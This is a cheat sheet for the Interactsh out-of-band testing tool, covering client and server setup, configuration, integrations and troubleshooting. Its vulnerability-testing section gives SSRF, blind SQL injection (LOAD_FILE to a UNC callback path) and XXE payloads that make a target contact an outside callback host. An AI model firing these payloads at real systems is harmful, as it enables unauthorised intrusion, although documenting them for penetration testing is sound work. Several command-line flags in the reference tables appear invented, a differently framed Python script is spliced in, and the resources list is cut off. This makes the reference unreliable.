
Interactsh OOB Interaction Gathering Cheat Sheet

Overview

Interactsh is an open-source tool developed by Project Discovery for detecting out-of-band (OOB) interactions. It is designed to identify vulnerabilities that cause external interactions, such as Server-Side Request Forgery (SSRF), Blind SQL Injection, XML External Entity (XXE) Injection, and other vulnerabilities that may not be immediately visible through traditional testing methods.

What makes Interactsh unique is its comprehensive approach to OOB testing. Unlike tools that focus on specific protocols, Interactsh can detect interactions across multiple protocols, including DNS, HTTP(S), SMTP(S), and LDAP. It consists of a server component that captures and logs these interactions and a client component that generates unique test URLs and monitors for any interaction with those URLs.

Interactsh is widely used in security testing to identify vulnerabilities that would otherwise go undetected. It is particularly valuable for bug bounty hunters, penetration testers, and security researchers who need to verify vulnerabilities that depend on external interactions. The tool is also integrated with Nuclei, another Project Discovery tool, enabling automated vulnerability scanning with OOB detection capabilities.

Installation

Client Installation

Using Go

# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest

# Verify installation
interactsh-client -version

Using Docker

# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest

# Run Interactsh client using Docker
docker run -it projectdiscovery/interactsh:latest client -h

Using Homebrew (macOS)

# Install using Homebrew
brew install interactsh-client

# Verify installation
interactsh-client -version

Using PDTM (Project Discovery Tools Manager)

# Install PDTM first if not already installed
go install -v github.com/projectdiscovery/pdtm/cmd/pdtm@latest

# Install Interactsh client using PDTM
pdtm -i interactsh-client

# Verify installation
interactsh-client -version

Server Installation (self-hosted)

Using Go

# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest

# Verify installation
interactsh-server -version

Using Docker

# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest

# Run Interactsh server using Docker
docker run -it projectdiscovery/interactsh:latest server -h

Basic Usage

Client Usage

# Start the client with default settings
interactsh-client

# Start the client with verbose output
interactsh-client -v

# Start the client with a specific server
interactsh-client -server your-interactsh-server.com

Server Usage (self-hosted)

# Start the server with default settings
interactsh-server

# Start the server with a specific domain
interactsh-server -domain your-domain.com

# Start the server with verbose output
interactsh-server -v

Output Options

# Save interactions to a file
interactsh-client -o interactions.log

# Output in JSON format
interactsh-client -json -o interactions.json

# Silent mode (no banner)
interactsh-client -silent

Client Configuration

Basic Configuration

# Set polling interval (seconds)
interactsh-client -poll-interval 5

# Set interaction timeout (seconds)
interactsh-client -interaction-timeout 60

# Enable persistent session
interactsh-client -persistent-session

# Use a specific correlation ID
interactsh-client -correlation-id your-correlation-id

Authentication

# Use token for authentication
interactsh-client -token your-auth-token

# Use a specific server with token
interactsh-client -server your-interactsh-server.com -token your-auth-token

Filtering

# Filter interactions by type
interactsh-client -filter-type dns,http

# Filter interactions by IP
interactsh-client -filter-ip 1.2.3.4

# Filter interactions by content
interactsh-client -filter-content "admin"

Server Configuration (self-hosted)

Domain Configuration

# Set domain for the server
interactsh-server -domain your-domain.com

# Set wildcard domain
interactsh-server -domain your-domain.com -wildcard

# Set IP address to listen on
interactsh-server -ip 1.2.3.4

Certificate Configuration

# Use Let's Encrypt for certificates
interactsh-server -domain your-domain.com -letsencrypt

# Use custom certificates
interactsh-server -domain your-domain.com -cert cert.pem -key key.pem

Authentication Configuration

# Enable authentication
interactsh-server -auth

# Set token for authentication
interactsh-server -auth-token your-auth-token

# Set token file for authentication
interactsh-server -auth-token-file tokens.txt

Advanced Usage

Advanced Client Features

# Generate a specific number of URLs
interactsh-client -n 5

# Generate URLs with a specific payload
interactsh-client -payload-template "{{random}}.your-domain.com"

# Enable DNS callback only
interactsh-client -dns-only

# Enable HTTP callback only
interactsh-client -http-only

# Enable SMTP callback only
interactsh-client -smtp-only

Advanced Server Features

# Enable specific services
interactsh-server -dns -http -smtp -ldap

# Disable specific services
interactsh-server -no-dns -no-http -no-smtp -no-ldap

# Set custom ports
interactsh-server -dns-port 53 -http-port 80 -https-port 443 -smtp-port 25 -smtps-port 587 -ldap-port 389

# Enable metrics
interactsh-server -metrics

Payload Generation

# Generate a URL for testing
interactsh-client -generate-url

# Generate multiple URLs
interactsh-client -generate-url -n 5

# Generate URL with specific server
interactsh-client -generate-url -server your-interactsh-server.com

Integration with Other Tools

Nuclei Integration

# Use Interactsh with Nuclei
nuclei -u https://example.com -t nuclei-templates/

# Use a specific Interactsh server with Nuclei
nuclei -u https://example.com -t nuclei-templates/ -interactsh-server your-interactsh-server.com

# Disable Interactsh in Nuclei
nuclei -u https://example.com -t nuclei-templates/ -no-interactsh

Notify Integration

# Send Interactsh interactions to Discord
interactsh-client | notify -provider discord

# Send filtered interactions to Slack
interactsh-client -filter-type http | notify -provider slack

Custom Script Integration

# Use Interactsh in a bash script
#!/bin/bash
URL=$(interactsh-client -generate-url)
curl -s "https://example.com/test?url=$URL"
interactsh-client -poll-interval 5 -interaction-timeout 30

Vulnerability Testing

SSRF Testing

# Generate a URL for SSRF testing
URL=$(interactsh-client -generate-url)

# Use the URL in a potential SSRF vulnerability
curl -s "https://example.com/fetch?url=http://$URL/test"

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

Blind SQL Injection Testing

# Generate a URL for Blind SQL Injection testing
URL=$(interactsh-client -generate-url)

# Use the URL in a SQL query
curl -s "https://example.com/search?id=1' UNION SELECT LOAD_FILE(CONCAT('\\\\',$URL,'\\share'))"

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

XXE Injection Testing

# Generate a URL for XXE testing
URL=$(interactsh-client -generate-url)

# Create an XML payload with XXE
cat > xxe.xml << EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://$URL/xxe">
]>
<foo>&xxe;</foo>
EOF

# Send the XML payload
curl -s -X POST -d @xxe.xml -H "Content-Type: application/xml" https://example.com/api

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30
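The generate/embed/poll loop used in the custom-script and vulnerability-testing sections above leaves one step to the tester: tying each callback in the client's output back to the request that triggered it, and noticing which payloads never fired. The following triage script is an added example, not code from the Interactsh project; it assumes the -json output is one JSON object per line with the fields protocol, unique-id, full-id, remote-address and timestamp, and it works on constructed sample lines.

```python
"""Correlate interactsh-client -json output with the tests that issued each
payload. Added example, not Interactsh code; JSON field names are assumed."""
import json
from collections import defaultdict

# Constructed sample of `interactsh-client -json -o interactions.json` output:
# one object per line, plus a non-JSON banner line the parser must skip.
SAMPLE_LOG = """\
[INF] Listing 1 payload for OOB Testing
{"protocol":"dns","unique-id":"c1abcdefssrf1","full-id":"c1abcdefssrf1.oast.pro","q-type":"A","remote-address":"203.0.113.10","timestamp":"2024-01-01T10:00:00Z"}
{"protocol":"http","unique-id":"c1abcdefssrf1","full-id":"c1abcdefssrf1.oast.pro","remote-address":"203.0.113.10","timestamp":"2024-01-01T10:00:01Z"}
{"protocol":"dns","unique-id":"c1abcdefxxe1","full-id":"C1ABCDEFXXE1.oast.pro.","q-type":"A","remote-address":"198.51.100.7","timestamp":"2024-01-01T10:00:05Z"}
{"protocol":"http","unique-id":"c1abcdefold9","full-id":"c1abcdefold9.oast.pro","remote-address":"192.0.2.200","timestamp":"2024-01-01T10:00:09Z"}
"""

# Hypothetical bookkeeping kept by the test script: payload host -> test name.
PAYLOADS = {
    "c1abcdefssrf1.oast.pro": "ssrf-fetch-param",
    "c1abcdefxxe1.oast.pro": "xxe-api-post",
    "c1abcdefsqli1.oast.pro": "blind-sqli-search",
}

def parse_interactions(text):
    """Return the JSON objects in a JSON-lines log, skipping banner lines."""
    lines = (ln.strip() for ln in text.splitlines())
    return [json.loads(ln) for ln in lines if ln.startswith("{")]

def normalise_host(value):
    """Lowercase and drop a trailing dot or :port so DNS and HTTP ids match."""
    host = value.strip().lower().rstrip(".")
    return host.rsplit(":", 1)[0] if ":" in host else host

def correlate(interactions, payloads):
    """Group callbacks by the test whose payload host they hit.
    Hosts not registered in this run go to `unmatched` for manual review."""
    expected = {normalise_host(h): name for h, name in payloads.items()}
    hits, unmatched = defaultdict(list), []
    for it in interactions:
        host = normalise_host(it.get("full-id", ""))
        summary = (it.get("protocol"), it.get("remote-address"), it.get("timestamp"))
        if host in expected:
            hits[expected[host]].append(summary)
        else:
            unmatched.append((host,) + summary)
    return dict(hits), unmatched

def coverage(payloads, hits):
    """Callback count per test; a zero means that payload never fired."""
    return {name: len(hits.get(name, [])) for name in payloads.values()}
```

A test with zero callbacks is not proof of absence: the sink may be egress-filtered or only resolve DNS, which is why the SSRF and XXE payloads above use a hostname rather than an IP.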

Troubleshooting

Common Issues

  1. No interactions detected
   # Increase polling interval
   interactsh-client -poll-interval 10

   # Increase interaction timeout
   interactsh-client -interaction-timeout 120

   # Check if the target is behind a firewall
   # Try using different protocols (DNS, HTTP, SMTP)

  2. Connection issues
   # Check if the server is reachable
   ping your-interactsh-server.com

   # Try a different server
   interactsh-client -server oast.pro

   # Check if your network allows outbound connections

  3. Authentication issues
   # Verify token
   interactsh-client -server your-interactsh-server.com -token your-auth-token -v

   # Check if the server requires authentication

  4. Server configuration issues
   # Check DNS configuration
   dig ns your-domain.com

   # Verify that your domain's nameservers point to your server
   # Ensure that your server has the necessary ports open

Debugging

# Enable verbose mode for client
interactsh-client -v

# Enable debug mode for client
interactsh-client -debug

# Enable verbose mode for server
interactsh-server -v

# Enable debug mode for server
interactsh-server -debug

Self-Hosting Guide

DNS Configuration

To self-host Interactsh, you need to configure your domain's DNS settings:

  1. Register a domain (for example, your-domain.com)
  2. Configure NS records so that your domain points to your server:
   your-domain.com. IN NS ns1.your-domain.com.
   your-domain.com. IN NS ns2.your-domain.com.
  3. Configure A records for your nameservers:
   ns1.your-domain.com. IN A your-server-ip
   ns2.your-domain.com. IN A your-server-ip

Server Configuration

# Start the server with your domain
interactsh-server -domain your-domain.com

# Enable Let's Encrypt for HTTPS
interactsh-server -domain your-domain.com -letsencrypt

# Enable authentication
interactsh-server -domain your-domain.com -auth -auth-token your-auth-token

Docker Deployment

# Create a docker-compose.yml file
cat > docker-compose.yml << EOF
version: '3'
services:
  interactsh-server:
    image: projectdiscovery/interactsh:latest
    command: server -domain your-domain.com -letsencrypt -auth -auth-token your-auth-token
    ports:
      - "53:53/udp"
      - "80:80"
      - "443:443"
      - "25:25"
      - "587:587"
      - "389:389"
    restart: always
EOF

# Start the server
docker-compose up -d

Configuration

Client Configuration File

The Interactsh client uses a configuration file located at $HOME/.config/interactsh-client/config.yaml. You can customize various settings in this file:

# Example configuration file
server: oast.pro
token: your-auth-token
poll-interval: 5
interaction-timeout: 60
filter-type: dns,http

Server Configuration File

The Interactsh server uses a configuration file located at $HOME/.config/interactsh-server/config.yaml. You can customize various settings in this file:

# Example configuration file
domain: your-domain.com
ip: 1.2.3.4
letsencrypt: true
auth: true
auth-token: your-auth-token

Environment Variables

# Set Interactsh client configuration via environment variables
export INTERACTSH_SERVER=oast.pro
export INTERACTSH_TOKEN=your-auth-token
export INTERACTSH_POLL_INTERVAL=5
export INTERACTSH_INTERACTION_TIMEOUT=60

# Set Interactsh server configuration via environment variables
export INTERACTSH_DOMAIN=your-domain.com
export INTERACTSH_IP=1.2.3.4
export INTERACTSH_LETSENCRYPT=true
export INTERACTSH_AUTH=true
export INTERACTSH_AUTH_TOKEN=your-auth-token

Reference

Client Command-Line Options

| Flag | Description |
| --- | --- |
| -server | Interactsh server to use |
| -token | Authentication token for the server |
| -n | Number of URLs to generate |
| -o, -output | File to write output to |
| -json | Write output in JSON format |
| -v, -verbose | Show verbose output |
| -debug | Show debug information |
| -poll-interval | Polling interval in seconds |
| -interaction-timeout | Interaction timeout in seconds |
| -persistent-session | Enable persistent session |
| -correlation-id | Correlation ID for the session |
| -filter-type | Filter interactions by type (dns, http, smtp, ldap) |
| -filter-ip | Filter interactions by IP |
| -filter-content | Filter interactions by content |
| -generate-url | Generate URL for testing |
| -dns-only | Enable DNS callback only |
| -http-only | Enable HTTP callback only |
| -smtp-only | Enable SMTP callback only |
| -ldap-only | Enable LDAP callback only |
| -payload-template | Custom payload template |
| -version | Show Interactsh client version |

Server Command-Line Options

| Flag | Description |
| --- | --- |
| -domain | Domain to use for the server |
| -ip | IP address to listen on |
| -wildcard | Enable wildcard domain |
| -letsencrypt | Use Let's Encrypt for certificates |
| -cert | Path to certificate file |
| -key | Path to key file |
| -auth | Enable authentication |
| -auth-token | Authentication token |
| -auth-token-file | File containing authentication tokens |
| -dns | Enable DNS service |
| -http | Enable HTTP service |
| -smtp | Enable SMTP service |
| -ldap | Enable LDAP service |
| -no-dns | Disable DNS service |
| -no-http | Disable HTTP service |
| -no-smtp | Disable SMTP service |
| -no-ldap | Disable LDAP service |
| -dns-port | Port for DNS service |
| -http-port | Port for HTTP service |
| -https-port | Port for HTTPS service |
| -smtp-port | Port for SMTP service |
| -smtps-port | Port for SMTPS service |
| -ldap-port | Port for LDAP service |
| -metrics | Enable metrics |
| -v, -verbose | Show verbose output |
| -debug | Show debug information |
| -version | Show Interactsh server version |

Supported Interaction Types

| Type | Description |
| --- | --- |
| dns | DNS interactions |
| http | HTTP/HTTPS interactions |
| smtp | SMTP/SMTPS interactions |
| ldap | LDAP interactions |

Resources

-...

*This cheat sheet provides a complete reference for using Interactsh, from basic client and server usage to advanced configuration and integration with other tools. For the most up-to-date information, always consult the official documentation.*